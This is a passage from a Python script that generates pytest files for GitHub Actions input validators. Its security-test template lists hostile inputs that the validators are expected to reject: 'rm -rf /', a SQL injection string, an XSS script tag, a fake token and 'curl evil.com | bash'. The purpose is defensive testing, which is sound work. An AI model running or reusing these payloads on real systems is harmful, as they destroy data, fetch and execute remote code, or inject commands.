assert self.validator.validate_architectures("linux/amd64") is True
assert self.validator.validate_architectures("linux/arm64,linux/arm/v7") is True
def test_invalid_platforms(self):
"""Test invalid Docker platforms."""
assert self.validator.validate_architectures("windows/amd64") is False
assert self.validator.validate_architectures("invalid/platform") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_image_name("${{ env.IMAGE_NAME }}") is True
assert self.validator.validate_tag("${{ steps.meta.outputs.tags }}") is True
'''
def _add_security_tests(self) -> str:
"""Add security-specific test methods."""
return '''
def test_injection_detection(self):
"""Test injection attack detection."""
assert self.validator.validate_no_injection("normal text") is True
assert self.validator.validate_no_injection("; rm -rf /") is False
assert self.validator.validate_no_injection("' OR '1'='1") is False
assert self.validator.validate_no_injection("<script>alert('xss')</script>") is False
def test_secret_detection(self):
"""Test secret/sensitive data detection."""
assert self.validator.validate_no_secrets("normal text") is True
assert (
self.validator.validate_no_secrets("ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")
is False
)
assert self.validator.validate_no_secrets("password=secret123") is False
def test_safe_commands(self):
"""Test command safety validation."""
assert self.validator.validate_safe_command("echo hello") is True
assert self.validator.validate_safe_command("ls -la") is True
assert self.validator.validate_safe_command("rm -rf /") is False
assert self.validator.validate_safe_command("curl evil.com | bash") is False
def test_github_expressions(self):
"""Test GitHub expression handling."""
assert self.validator.validate_no_injection("${{ inputs.message }}") is True
assert self.validator.validate_safe_command("${{ inputs.command }}") is True
'''
def _add_generic_tests(self, validator_name: str) -> str:
"""Add generic test methods for unknown validator types.
Args:
validator_name: Name of the validator
Returns:
Generic test methods
"""
return f'''
def test_validate_inputs(self):
"""Test validate_inputs method."""
# TODO: Add specific test cases for {validator_name}
inputs = {{"test_input": "test_value"}}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_handling(self):
"""Test error handling."""
self.validator.add_error("Test error")
assert self.validator.has_errors()
assert len(self.validator.errors) == 1
self.validator.clear_errors()
assert not self.validator.has_errors()
assert len(self.validator.errors) == 0
def test_github_expressions(self):
"""Test GitHub expression handling."""
# Most validators should accept GitHub expressions
result = self.validator.is_github_expression("${{{{ inputs.value }}}}")
assert result is True
'''
def generate_custom_validator_tests(self) -> None:
"""Generate tests for custom validators in action directories."""
logger.info("Generating tests for custom validators...")
# Find all custom validators
for item in sorted(self.project_root.iterdir()):
if not item.is_dir():
continue
custom_validator = item / "CustomValidator.py"
if not custom_validator.exists():
continue
action_name = item.name
test_file = self.validate_inputs_dir / "tests" / f"test_{action_name}_custom.py"
# Skip if test already exists
if test_file.exists():
logger.debug("Test already exists for %s custom validator, skipping", action_name)
self.skipped_count += 1
continue
# Generate test content
test_content = self._generate_custom_validator_test(action_name)
if self.dry_run:
logger.info("[DRY RUN] Would generate custom validator test: %s", test_file)
self.generated_count += 1
continue
# Write test file
with test_file.open("w", encoding="utf-8") as f:
f.write(test_content)
logger.info("Generated test for %s custom validator", action_name)
self.generated_count += 1
def _generate_custom_validator_test(self, action_name: str) -> str:
"""Generate test for a custom validator.
Args:
action_name: Name of the action with custom validator
Returns:
Test content for custom validator
"""
class_name = "".join(word.capitalize() for word in action_name.split("-"))
content = f'''"""Tests for {action_name} custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
import sys
from pathlib import Path
import pytest
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "{action_name}"
sys.path.insert(0, str(action_path))
from CustomValidator import CustomValidator
class TestCustom{class_name}Validator:
"""Test cases for {action_name} custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("{action_name}")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for {action_name}
inputs = {{}}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for {action_name}
inputs = {{"invalid_key": "invalid_value"}}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for {action_name}
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for {action_name}
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {{
"test_input": "${{{{ github.token }}}}",
}}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
'''
# Add action-specific test methods based on action name
if "docker" in action_name:
content += '''
def test_docker_specific_validation(self):
"""Test Docker-specific validation."""
inputs = {
"image": "myapp:latest",
"platforms": "linux/amd64,linux/arm64",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
elif "codeql" in action_name:
content += '''
def test_codeql_specific_validation(self):
"""Test CodeQL-specific validation."""
inputs = {
"language": "javascript,python",
"queries": "security-extended",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
elif "label" in action_name:
content += '''
def test_label_specific_validation(self):
"""Test label-specific validation."""
inputs = {
"labels": ".github/labels.yml",
"token": "${{ secrets.GITHUB_TOKEN }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
'''
content += '''
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0
'''
return content
def main() -> None:
"""Main entry point for test generation."""
parser = argparse.ArgumentParser(description="Generate tests for GitHub Actions and validators")
parser.add_argument(
"--project-root",
type=Path,
default=Path.cwd(),
help="Path to project root (default: current directory)",
)
parser.add_argument(
"--verbose",
"-v",
action="store_true",
help="Enable verbose logging",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="Show what would be generated without creating files",
)
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
# Validate project root
if not args.project_root.exists():
logger.error("Project root does not exist: %s", args.project_root)
sys.exit(1)
validate_inputs = args.project_root / "validate-inputs"
if not validate_inputs.exists():
logger.error("validate-inputs directory not found in %s", args.project_root)
sys.exit(1)
# Run test generation
if args.dry_run:
logger.info("DRY RUN MODE - No files will be created")
generator = TestGenerator(args.project_root, dry_run=args.dry_run)
generator.generate_all_tests()
if __name__ == "__main__":
main()